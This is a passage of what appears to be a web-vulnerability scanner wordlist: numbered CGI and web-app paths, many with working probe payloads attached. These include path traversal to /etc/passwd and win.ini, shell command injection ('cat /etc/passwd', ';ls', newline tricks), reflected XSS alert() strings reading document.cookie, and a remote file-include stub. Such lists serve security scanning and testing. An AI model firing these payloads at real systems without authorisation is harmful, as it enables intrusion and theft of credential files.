+ cgi-bin/csPassword.cgi
951
+ cgi-bin/csPassword/csPassword.cgi
952
+ cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
953
+ cgi-bin/csh
954
+ cgi-bin/cstat.pl
955
+ cgi-bin/cutecast/members/
956
+ cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
957
+ cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
958
+ cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
959
+ cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
960
+ cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
961
+ cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
962
+ cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
963
+ cgi-bin/dasp/fm_shell.asp
964
+ cgi-bin/data/fetch.php?page=
965
+ cgi-bin/date
966
+ cgi-bin/day5datacopier.cgi
967
+ cgi-bin/day5datanotifier.cgi
968
+ cgi-bin/db2www/library/document.d2w/show
969
+ cgi-bin/db4web_c/dbdirname//etc/passwd
970
+ cgi-bin/db_manager.cgi
971
+ cgi-bin/dbman/db.cgi?db=no-db
972
+ cgi-bin/dbmlparser.exe
973
+ cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
974
+ cgi-bin/dcshop/auth_data/auth_user_file.txt
975
+ cgi-bin/dcshop/orders/orders.txt
976
+ cgi-bin/dfire.cgi
977
+ cgi-bin/diagnose.cgi
978
+ cgi-bin/dig.cgi
979
+ cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
980
+ cgi-bin/displayTC.pl
981
+ cgi-bin/dnewsweb
982
+ cgi-bin/donothing
983
+ cgi-bin/dose.pl?daily&somefile.txt&|ls|
984
+ cgi-bin/dumpenv.pl
985
+ cgi-bin/echo.bat
986
+ cgi-bin/echo.bat?&dir+c:\
987
+ cgi-bin/edit.pl
988
+ cgi-bin/empower?DB=whateverwhatever
989
+ cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
990
+ cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
991
+ cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
992
+ cgi-bin/enter.cgi
993
+ cgi-bin/environ.cgi
994
+ cgi-bin/environ.pl
995
+ cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
996
+ cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
997
+ cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
998
+ cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
999
+ cgi-bin/ex-logger.pl
1000
+ cgi-bin/excite
1001
+ cgi-bin/excite;IFS=\"$\";/bin/cat
1002
+ cgi-bin/ezadmin.cgi
1003
+ cgi-bin/ezboard.cgi
1004
+ cgi-bin/ezman.cgi
1005
+ cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
1006
+ cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
1007
+ cgi-bin/ezshopper2/loadpage.cgi
1008
+ cgi-bin/ezshopper3/loadpage.cgi
1009
+ cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
1010
+ cgi-bin/faxsurvey?cat%20/etc/passwd
1011
+ cgi-bin/filemail
1012
+ cgi-bin/filemail.pl
1013
+ cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
1014
+ cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
1015
+ cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1016
+ cgi-bin/formmail.pl
1017
+ cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1018
+ cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1019
+ cgi-bin/fortune
1020
+ cgi-bin/foxweb.dll
1021
+ cgi-bin/foxweb.exe
1022
+ cgi-bin/fpadmin.htm
1023
+ cgi-bin/fpremadm.exe
1024
+ cgi-bin/fpsrvadm.exe
1025
+ cgi-bin/ftp.pl
1026
+ cgi-bin/ftpsh
1027
+ cgi-bin/gH.cgi
1028
+ cgi-bin/gbadmin.cgi?action=change_adminpass
1029
+ cgi-bin/gbadmin.cgi?action=change_automail
1030
+ cgi-bin/gbadmin.cgi?action=colors
1031
+ cgi-bin/gbadmin.cgi?action=setup
1032
+ cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
1033
+ cgi-bin/gbpass.pl
1034
+ cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
1035
+ cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
1036
+ cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
1037
+ cgi-bin/getdoc.cgi
1038
+ cgi-bin/gettransbitmap
1039
+ cgi-bin/glimpse
1040
+ cgi-bin/gm-cplog.cgi
1041
+ cgi-bin/gm.cgi
1042
+ cgi-bin/guestbook.cgi
1043
+ cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
1044
+ cgi-bin/guestbook.pl
1045
+ cgi-bin/handler
1046
+ cgi-bin/handler/netsonar;cat
1047
+ cgi-bin/hello.bat?&dir+c:\
1048
+ cgi-bin/hitview.cgi
1049
+ cgi-bin/horde/test.php
1050
+ cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
1051
+ cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
1052
+ cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
1053
+ cgi-bin/htimage.exe
1054
+ cgi-bin/htimage.exe/path/filename?2,2
1055
+ cgi-bin/html2chtml.cgi
1056
+ cgi-bin/html2wml.cgi
1057
+ cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
1058
+ cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
1059
+ cgi-bin/htsearch?-c/nonexistant
1060
+ cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
1061
+ cgi-bin/htsearch?exclude=%60/etc/passwd%60
1062
+ cgi-bin/ibill.pm
1063
+ cgi-bin/icat
1064
+ cgi-bin/if/admin/nph-build.cgi
1065
+ cgi-bin/ikonboard/help.cgi?
1066
+ cgi-bin/imageFolio.cgi
1067
+ cgi-bin/imagefolio/admin/admin.cgi
1068
+ cgi-bin/imagemap
1069
+ cgi-bin/imagemap.exe
1070
+ cgi-bin/include/new-visitor.inc.php
1071
+ cgi-bin/index.js0x70
1072
+ cgi-bin/index.pl
1073
+ cgi-bin/info2www
1074
+ cgi-bin/infosrch.cgi
1075
+ cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
1076
+ cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
1077
+ cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
1078
+ cgi-bin/ion-p?page=../../../../../etc/passwd
1079
+ cgi-bin/jailshell
1080
+ cgi-bin/jj
1081
+ cgi-bin/journal.cgi?folder=journal.cgi%00
1082
+ cgi-bin/ksh
1083
+ cgi-bin/lastlines.cgi?process
1084
+ cgi-bin/listrec.pl
1085
+ cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
1086
+ cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
1087
+ cgi-bin/log-reader.cgi
1088
+ cgi-bin/log/
1089
+ cgi-bin/log/nether-log.pl?checkit
1090
+ cgi-bin/login.cgi
1091
+ cgi-bin/login.pl
1092
+ cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
1093
+ cgi-bin/logit.cgi
1094
+ cgi-bin/logs.pl
1095
+ cgi-bin/logs/
1096
+ cgi-bin/logs/access_log
1097
+ cgi-bin/logs/error_log
1098
+ cgi-bin/lookwho.cgi
1099
+ cgi-bin/ls
1100
+ cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
1101
+ cgi-bin/mail
1102
+ cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1103
+ cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
1104
+ cgi-bin/mailform.exe
1105
+ cgi-bin/mailit.pl
1106
+ cgi-bin/maillist.cgi
1107
+ cgi-bin/maillist.pl
1108
+ cgi-bin/mailnews.cgi
1109
+ cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
1110
+ cgi-bin/main_menu.pl
1111
+ cgi-bin/majordomo.pl
1112
+ cgi-bin/man.sh
1113
+ cgi-bin/man2html
1114
+ cgi-bin/mastergate/search.cgi?search=0&search_on=all
1115
+ cgi-bin/meta.pl
1116
+ cgi-bin/mgrqcgi
1117
+ cgi-bin/mini_logger.cgi
1118
+ cgi-bin/minimal.exe
1119
+ cgi-bin/mkilog.exe
1120
+ cgi-bin/mkplog.exe
1121
+ cgi-bin/mmstdod.cgi
1122
+ cgi-bin/moin.cgi?test
1123
+ cgi-bin/mojo/mojo.cgi
1124
+ cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
1125
+ cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
1126
+ cgi-bin/mrtg.cgi?cfg=blah
1127
+ cgi-bin/ms_proxy_auth_query/
1128
+ cgi-bin/mt-static/
1129
+ cgi-bin/mt-static/mt-check.cgi
1130
+ cgi-bin/mt-static/mt-load.cgi
1131
+ cgi-bin/mt-static/mt.cfg
1132
+ cgi-bin/mt/
1133
+ cgi-bin/mt/mt-check.cgi
1134
+ cgi-bin/mt/mt-load.cgi
1135
+ cgi-bin/mt/mt.cfg
1136
+ cgi-bin/multihtml.pl?multi=/etc/passwd%00html
1137
+ cgi-bin/musicqueue.cgi
1138
+ cgi-bin/myguestbook.cgi?action=view
1139
+ cgi-bin/namazu.cgi
1140
+ cgi-bin/nbmember.cgi?cmd=list_all_users
1141
+ cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
1142
+ cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
1143
+ cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
1144
+ cgi-bin/netpad.cgi
1145
+ cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
1146
+ cgi-bin/nimages.php
1147
+ cgi-bin/nlog-smb.cgi
1148
+ cgi-bin/nlog-smb.pl
1149
+ cgi-bin/non-existent.pl
1150
+ cgi-bin/noshell
1151
+ cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1152
+ cgi-bin/nph-error.pl
1153
+ cgi-bin/nph-exploitscanget.cgi
1154
+ cgi-bin/nph-maillist.pl
1155
+ cgi-bin/nph-publish
1156
+ cgi-bin/nph-publish.cgi
1157
+ cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
1158
+ cgi-bin/nph-test-cgi
1159
+ cgi-bin/ntitar.pl
1160
+ cgi-bin/opendir.php?/etc/passwd
1161
+ cgi-bin/orders/orders.txt
1162
+ cgi-bin/pagelog.cgi
1163
+ cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
1164
+ cgi-bin/parse-file
1165
+ cgi-bin/pass
1166
+ cgi-bin/passwd
1167
+ cgi-bin/passwd.txt
1168
+ cgi-bin/password
1169
+ cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
1170
+ cgi-bin/perl
1171
+ cgi-bin/perl.exe
1172
+ cgi-bin/perl.exe?-v
1173
+ cgi-bin/perl?-v
1174
+ cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
1175
+ cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
1176
+ cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
1177
+ cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
1178
+ cgi-bin/phf
1179
+ cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
1180
+ cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
1181
+ cgi-bin/photo/
1182
+ cgi-bin/photo/manage.cgi
1183
+ cgi-bin/php-cgi
1184
+ cgi-bin/php.cgi?/etc/passwd
1185
+ cgi-bin/plusmail
1186
+ cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
1187
+ cgi-bin/pollssi.cgi
1188
+ cgi-bin/post-query
1189
+ cgi-bin/post16.exe
1190
+ cgi-bin/post32.exe|dir%20c:\
1191
+ cgi-bin/post_query
1192
+ cgi-bin/postcards.cgi
1193
+ cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
1194
+ cgi-bin/ppdscgi.exe
1195
+ cgi-bin/printenv
1196
+ cgi-bin/printenv.tmp
1197
+ cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
1198
+ cgi-bin/processit.pl
1199
+ cgi-bin/profile.cgi
1200
+ cgi-bin/pu3.pl
1201
+ cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
1202
+ cgi-bin/query
1203
+ cgi-bin/query?mss=%2e%2e/config
1204
+ cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
1205
+ cgi-bin/quikstore.cfg
1206
+ cgi-bin/quizme.cgi
1207
+ cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
1208
+ cgi-bin/ratlog.cgi
1209
+ cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
1210
+ cgi-bin/redirect
1211
+ cgi-bin/register.cgi
1212
+ cgi-bin/replicator/webpage.cgi/
1213
+ cgi-bin/responder.cgi
1214
+ cgi-bin/retrieve_password.pl
1215
+ cgi-bin/rguest.exe
1216
+ cgi-bin/rightfax/fuwww.dll/?
1217
+ cgi-bin/rksh
1218
+ cgi-bin/rmp_query
1219
+ cgi-bin/robadmin.cgi
1220
+ cgi-bin/robpoll.cgi
1221
+ cgi-bin/rpm_query
1222
+ cgi-bin/rsh
1223
+ cgi-bin/rtm.log
1224
+ cgi-bin/rwcgi60
1225
+ cgi-bin/rwcgi60/showenv
1226
+ cgi-bin/rwwwshell.pl
1227
+ cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
1228
+ cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
1229
+ cgi-bin/sbcgi/sitebuilder.cgi
1230
+ cgi-bin/scoadminreg.cgi
1231
+ cgi-bin/scripts/*%0a.pl
1232
+ cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
1233
+ cgi-bin/search
1234
+ cgi-bin/search.cgi
1235
+ cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
1236
+ cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
1237
+ cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
1238
+ cgi-bin/search.pl
1239
+ cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
1240
+ cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
1241
+ cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
1242
+ cgi-bin/sendform.cgi
1243
+ cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
1244
+ cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
1245
+ cgi-bin/sensepost.exe?/c+dir
1246
+ cgi-bin/session/adminlogin
1247
+ cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
1248
+ cgi-bin/sh
1249
+ cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
1250
+ cgi-bin/shop.pl/page=;cat%20shop.pl|
1251
+ cgi-bin/shop/auth_data/auth_user_file.txt
1252
+ cgi-bin/shop/orders/orders.txt
1253
+ cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
1254
+ cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
1255
+ cgi-bin/show.pl
1256
+ cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
1257
+ cgi-bin/showuser.cgi
1258
+ cgi-bin/shtml.dll
1259
+ cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
1260
+ cgi-bin/simplestguest.cgi
1261
+ cgi-bin/simplestmail.cgi
1262
+ cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
1263
+ cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
1264
+ cgi-bin/snorkerz.bat
1265
+ cgi-bin/snorkerz.cmd
1266
+ cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
1267
+ cgi-bin/spin_client.cgi?aaaaaaaa
1268
+ cgi-bin/ss
1269
+ cgi-bin/sscd_suncourier.pl
1270
+ cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
1271
+ cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
1272
+ cgi-bin/stat.pl
1273
+ cgi-bin/stat/
1274
+ cgi-bin/stats-bin-p/reports/index.html
1275
+ cgi-bin/stats.pl
1276
+ cgi-bin/stats.prf
1277
+ cgi-bin/stats/
1278
+ cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
1279
+ cgi-bin/stats_old/
1280
+ cgi-bin/statsconfig
1281
+ cgi-bin/statusconfig.pl
1282
+ cgi-bin/statview.pl
1283
+ cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
1284
+ cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
1285
+ cgi-bin/store/agora.cgi?page=whatever33.html
1286
+ cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
1287
+ cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
1288
+ cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
1289
+ cgi-bin/survey
1290
+ cgi-bin/survey.cgi
1291
+ cgi-bin/sws/admin.html
1292
+ cgi-bin/sws/manager.pl
1293
+ cgi-bin/tablebuild.pl
1294
+ cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
1295
+ cgi-bin/tcsh
1296
+ cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
1297
+ cgi-bin/test-cgi
1298
+ cgi-bin/test-cgi.bat
1299
+ cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
1300
+ cgi-bin/test-cgi.tcl
1301
+ cgi-bin/test-cgi?/*
1302
+ cgi-bin/test-env
1303
+ cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
1304
+ cgi-bin/test.cgi
1305
+ cgi-bin/test/test.cgi
1306
+ cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
1307
+ cgi-bin/testcgi.exe
1308
+ cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
1309
+ cgi-bin/testing_whatever
1310
+ cgi-bin/texis.exe/junk
1311
+ cgi-bin/texis/junk
1312
+ cgi-bin/texis/phine
1313
+ cgi-bin/textcounter.pl
1314
+ cgi-bin/tidfinder.cgi
1315
+ cgi-bin/tigvote.cgi
1316
+ cgi-bin/title.cgi
1317
+ cgi-bin/tpgnrock
1318
+ cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
1319
+ cgi-bin/troops.cgi
1320
+ cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
1321
+ cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
1322
+ cgi-bin/ultraboard.cgi
1323
+ cgi-bin/ultraboard.pl
1324
+ cgi-bin/unlg1.1
1325
+ cgi-bin/unlg1.2
1326
+ cgi-bin/update.dpgs
1327
+ cgi-bin/upload.cgi
1328
+ cgi-bin/uptime
1329
+ cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
1330
+ cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
1331
+ cgi-bin/utm/admin
1332
+ cgi-bin/utm/utm_stat
1333
+ cgi-bin/view-source
1334
+ cgi-bin/view-source?view-source
1335
+ cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
1336
+ cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
1337
+ cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
1338
+ cgi-bin/viewlogs.pl
1339
+ cgi-bin/viewsource?/etc/passwd
1340
+ cgi-bin/viralator.cgi
1341
+ cgi-bin/virgil.cgi
1342
+ cgi-bin/visadmin.exe
1343
+ cgi-bin/visitor.exe
1344
+ cgi-bin/vote.cgi
1345
+ cgi-bin/vpasswd.cgi
1346
+ cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
1347
+ cgi-bin/w3-msql
1348
+ cgi-bin/w3-sql
1349
+ cgi-bin/wais.pl
1350
+ cgi-bin/way-board.cgi?db=/etc/passwd%00
1351
+ cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
1352
+ cgi-bin/wconsole.dll
1353
+ cgi-bin/webais
1354
+ cgi-bin/webbbs.cgi
1355
+ cgi-bin/webbbs.exe
1356
+ cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
1357
+ cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
1358
+ cgi-bin/webdist.cgi
1359
+ cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
1360
+ cgi-bin/webdriver
1361
+ cgi-bin/webfind.exe?keywords=01234567890123456789
1362
+ cgi-bin/webgais
1363
+ cgi-bin/webif.cgi
1364
+ cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1365
+ cgi-bin/webmap.cgi
1366
+ cgi-bin/webnews.pl
1367
+ cgi-bin/webplus.exe?about
1368
+ cgi-bin/webplus?about
1369
+ cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
1370
+ cgi-bin/websendmail
1371
+ cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
1372
+ cgi-bin/webutil.pl
1373
+ cgi-bin/webutils.pl
1374
+ cgi-bin/webwho.pl
1375
+ cgi-bin/wguest.exe
1376
+ cgi-bin/where.pl?sd=ls%20/etc
1377
+ cgi-bin/whois.cgi?action=load&whois=%3Bid
1378
+ cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
1379
+ cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
1380
+ cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
1381
+ cgi-bin/windmail
1382
+ cgi-bin/windmail.exe
1383
+ cgi-bin/wrap
1384
+ cgi-bin/ws_ftp.ini
1385
+ cgi-bin/www-sql
1386
+ cgi-bin/wwwadmin.pl
1387
+ cgi-bin/wwwboard.cgi.cgi
1388
+ cgi-bin/wwwboard.pl
1389
+ cgi-bin/wwwstats.pl
1390
+ cgi-bin/wwwthreads/3tvars.pm
1391
+ cgi-bin/wwwthreads/w3tvars.pm
1392
+ cgi-bin/wwwwais
1393
+ cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
1394
+ cgi-bin/zsh
1395
+ cgi-dos/args.bat
1396
+ cgi-lib.pl
1397
+ cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
1398
+ cgi-local/cgiemail-1.4/cgicso?query=AAA
1399
+ cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
1400
+ cgi-local/cgiemail-1.6/cgicso?query=AAA
1401
+ cgi-shl/win-c-sample.exe
1402
+ cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
1403
+ cgi-sys/FormMail-clone.cgi
1404
+ cgi-sys/addalink.cgi
1405
+ cgi-sys/cgiecho
1406
+ cgi-sys/cgiemail
1407
+ cgi-sys/countedit
1408
+ cgi-sys/domainredirect.cgi
1409
+ cgi-sys/entropybanner.cgi
1410
+ cgi-sys/entropysearch.cgi
1411
+ cgi-sys/helpdesk.cgi
1412
+ cgi-sys/mchat.cgi
1413
+ cgi-sys/randhtml.cgi
1414
+ cgi-sys/realhelpdesk.cgi
1415
+ cgi-sys/realsignup.cgi
1416
+ cgi-sys/scgiwrap
1417
+ cgi-sys/signup.cgi
1418
+ cgi-win/cgitest.exe
1419
+ cgi-win/uploader.exe
1420
+ cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
1421
+ cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
1422
+ cgi/cgiproc?
1423
+ cgicso?query=<script>alert('Vulnerable')</script>
1424
+ cgicso?query=<script>alert('XSS')</script>
1425
+ cgicso?query=AAA
1426
+ cgiforum.pl?thesection=../../../../../../../../../../etc
1427
+ cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
1428
+ cgimail.exe
1429
+ cgis/wwwboard/wwwboard.cgi
1430
+ cgis/wwwboard/wwwboard.pl
1431
+ cgitest.exe
1432
+ cgiwrap
1433
+ cgiwrap/%3Cfont%20color=red%3E
1434
+ cgiwrap/~@U
1435
+ cgiwrap/~@USERS
1436
+ cgiwrap/~JUNK(5)
1437
+ cgiwrap/~root
1438
+ change-your-password.pl
1439
+ chassis/config/GeneralChassisConfig.html
1440
+ chat/!nicks.txt
1441
+ chat/!pwds.txt
1442
+ chat/data/usr
1443
+ chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
1444
+ chat_dir/register.php
1445
+ chatlog.nsf
1446
+ checkout_payment.php
1447
+ class/mysql.class
1448
+ classified.cgi
1449
+ classifieds
1450
+ classifieds.cgi
1451
+ classifieds/classifieds.cgi
1452
+ classifieds/index.cgi
1453
+ clbusy.nsf
1454
+ cldbdir.nsf
1455
+ cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
1456
+ cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
1457
+ clickcount.pl?view=test
1458
+ clickresponder.pl
1459
+ client/
1460
+ cliente/
1461
+ clientes/
1462
+ clients/
1463
+ clocktower/
1464
+ clusta4.nsf
1465
+ clusterframe.jsp
1466
+ clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
1467
+ cm/
1468
+ cmd.exe?/c+dir
1469
+ cmd1.exe?/c+dir
1470
+ code.php
1471
+ code.php3
1472
+ code/
1473
+ collect4.nsf
1474
+ com
1475
+ com/
1476
+ com/novell/
1477
+ com/novell/gwmonitor/help/en/default.htm
1478
+ com/novell/webaccess
1479
+ com/novell/webaccess/help/en/default.htm
1480
+ com/novell/webpublisher/help/en/default.htm
1481
+ com5..........................................................................................................................................................................................................................box
1482
+ com5.java
1483
+ com5.pl
1484
+ commandit.cgi
1485
+ comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
1486
+ comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
1487
+ comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
1488
+ commerce.cgi?page=../../../../../../../../../../etc
1489
+ commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
1490
+ common.php?f=0&ForumLang=../../../../../../../../../../etc
1491
+ common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
1492
+ common/listrec.pl
1493
+ common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
1494
+ communicator/
1495
+ communique.asp
1496
+ community/forumdisplay.php
1497
+ community/index.php?analized=anything
1498
+ community/member.php
1499
+ compatible.cgi
1500
+ compra/
1501
+ compras/
1502
+ compressed/
1503
+ compte.php
1504
+ conecta/
1505
+ config.inc
1506
+ config.php
1507
